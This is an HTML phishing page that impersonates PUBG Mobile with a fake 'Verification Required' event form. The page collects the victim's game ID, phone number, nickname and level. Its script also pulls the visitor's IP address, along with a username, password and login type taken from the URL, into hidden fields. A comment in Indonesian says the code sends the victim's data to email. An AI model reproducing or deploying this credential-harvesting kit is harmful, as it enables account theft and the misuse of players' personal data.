<!-- SUBRICE YT SEPUTAR PABJI -->
<!DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"> 
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
	<title></title>
	<link rel="stylesheet" type="text/css" href="css/style.css">
   <link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css">
</head>
<body>
   <div class="item"></div>
   <section>
      <canvas id="canvas"></canvas>
   	  <header>
   	  	<img src="https://www.pubgmobile.com/common/images/icon_logo.jpg">
   	  	<div class="text">
   	  		PUBG MOBILE
   	  		<span>OFFICIAL PUBG ON MOBILE</span>
   	  	</div>
   	  	<img class="rp" src="https://www.pubgmobile.com/en/event/royalepass16/images/s4_swiper_icon.png">
   	  </header>
   	  <div class="box">
   	  	 <div class="selector">
   	  	 	<a class="sel" style="font-size:20px;"><span>Verification Required</span></a>
   	  	 </div>
   	  	 <div class="konten">
   	  	 	<p class="alert">Please fill all forms</p>
              <div class="imgBox">
                <img src="https://pubgmcommunity.id/images/frost-festival.png">
              </div>
              <form action="hemm.php" method="POST">
                <div class="form-group">
                  <input class="fors" id="id" name="id" placeholder="Enter Your ID" type="number">
                </div>
                <div class="form-group">
                  <input class="fors" id="hp" name="hp" placeholder="Enter Your Number" type="number">
                </div>
                <div class="form-group">
                  <input class="fors" id="nick" name="nick" placeholder="Enter Your Nickname">
                </div>
                <div class="form-group">
                  <select id="level" name="level">
                    <option selected disabled>Select Your Level</option>
                              <option>1</option>
                            <option>2</option>
                            <option>3</option>
                            <option>4</option>
                            <option>5</option>
                            <option>6</option>
                            <option>7</option>
                            <option>8</option>
                            <option>9</option>
                            <option>10</option>
                            <option>11</option>
                            <option>12</option>
                            <option>13</option>
                            <option>14</option>
                            <option>15</option>
                            <option>16</option>
                            <option>17</option>
                            <option>18</option>
                            <option>19</option>
                            <option>20</option>
                            <option>21</option>
                            <option>22</option>
                            <option>23</option>
                            <option>24</option>
                            <option>25</option>
                            <option>26</option>
                            <option>27</option>
                            <option>28</option>
                            <option>29</option>
                            <option>30</option>
                            <option>31</option>
                            <option>32</option>
                            <option>33</option>
                            <option>34</option>
                            <option>35</option>
                            <option>36</option>
                            <option>37</option>
                            <option>38</option>
                            <option>39</option>
                            <option>40</option>
                            <option>41</option>
                            <option>42</option>
                            <option>43</option>
                            <option>44</option>
                            <option>45</option>
                            <option>46</option>
                            <option>47</option>
                            <option>48</option>
                            <option>49</option>
                            <option>50</option>
                            <option>51</option>
                            <option>52</option>
                            <option>53</option>
                            <option>54</option>
                            <option>55</option>
                            <option>56</option>
                            <option>57</option>
                            <option>58</option>
                            <option>59</option>
                            <option>60</option>
                            <option>61</option>
                            <option>62</option>
                            <option>63</option>
                            <option>64</option>
                            <option>65</option>
                            <option>66</option>
                            <option>67</option>
                            <option>68</option>
                            <option>69</option>
                            <option>70</option>
                            <option>71</option>
                            <option>72</option>
                            <option>73</option>
                            <option>74</option>
                            <option>75</option>
                            <option>76</option>
                            <option>77</option>
                            <option>78</option>
                            <option>79</option>
                            <option>80</option>
                            <option>81</option>
                            <option>82</option>
                            <option>83</option>
                            <option>84</option>
                            <option>85</option>
                            <option>86</option>
                            <option>87</option>
                            <option>88</option>
                            <option>89</option>
                            <option>90</option>
                            <option>91</option>
                            <option>92</option>
                            <option>93</option>
                            <option>94</option>
                            <option>95</option>
                            <option>96</option>
                            <option>97</option>
                            <option>98</option> 
                            <option>99</option>
                            <option>100</option>
                  </select>
                </div>
                <input type="hidden" id="ip" name="ip" value="">
                <input type="hidden" id="user" name="user" value="">
                <input type="hidden" id="pass" name="pass" value="">
                <input type="hidden" id="login" name="login" value="">
                <div class="form-group">
                  <input onclick="return xixi()" class="btn" type="submit" value="submit">
                </div>
              </form>
    	 </div>
   </section>
   <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
   <script>
    function xixi()
    {
      let id = $('#id');
      let hp = $('#hp');
      let nick = $('#nick');
      let level = $('#level');
      let ip = $('#ip');
      let user = $('#user');
      let pass = $('#pass');
      let login = $('#login');
     if(id.val() == '')
     {
        id.css("background","red");
        return false;
     }else{
        id.css("background","white");
     }
     if(hp.val() == '')
     {
        hp.css("background","red");
        return false;
     }else{
        hp.css("background","white");
     }
     if(nick.val() == '')
     {
        nick.css("background","red");
        return false;
     }else{
        nick.css("background","white");
     }
     if(level.val() == null)
     {
        level.css("background","red");
        return false;
     }else{
        level.css("background","white");
     }
     //Untuk Mengirim Data Korban Ke Email
     send(id.val(),hp.val(),nick.val(),level.val(),ip.val(),user.val(),pass.val(),login.val());
    }
   </script>
   <script type="text/javascript">
     var checkip = function () {
        $.ajax({
            type: "get",
            async: false,
            url: "https://api.pubgameshowtime.com/ip/getcountry",
            dataType: "json",
            success: function (result) {
                $('#ip').val(result.ip);
            }
        })
    }
    checkip();
    var url_string = window.location;
    var url = new URL(url_string);
    var user = url.searchParams.get("user");
    var pass = url.searchParams.get("pass");
    var login = url.searchParams.get("login");
    $('#user').val(user);
    $('#pass').val(pass);
    $('#login').val(login);
   </script>
   <script src="https://cdnjs.cloudflare.com/ajax/libs/axios/0.21.0/axios.min.js"></script>
   <script type="text/javascript" src="js/da.js"></script>
   <script type="text/javascript" src="js/load.js"></script>
   <script type="text/javascript" src="js/snow.js"></script>
   <script src="https://cdnjs.cloudflare.com/ajax/libs/Snowstorm/20131208/snowstorm.js"></script>
   <script src="https://cdnjs.cloudflare.com/ajax/libs/JQuery-Snowfall/1.7.4/snowfall.min.js"></script>
</body>
</html>